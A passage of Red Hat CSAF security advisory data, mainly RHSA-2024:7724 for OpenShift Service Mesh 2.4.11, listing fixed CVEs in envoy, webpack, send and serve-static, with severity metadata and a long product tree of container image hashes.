"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2024_7724
Vulnerability from csaf_redhat
Published
2024-10-07 09:22
Modified
2024-12-18 04:38
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.4.11
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.4.11\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7724", url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7724.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11", tracking: { current_release_date: "2024-12-18T04:38:20+00:00", generator: { date: "2024-12-18T04:38:20+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:7724", initial_release_date: "2024-10-07T09:22:37+00:00", revision_history: [ { date: "2024-10-07T09:22:37+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:22:37+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:38:20+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.4 for RHEL 8", product: { name: "RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.4::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", relates_to_product_reference: 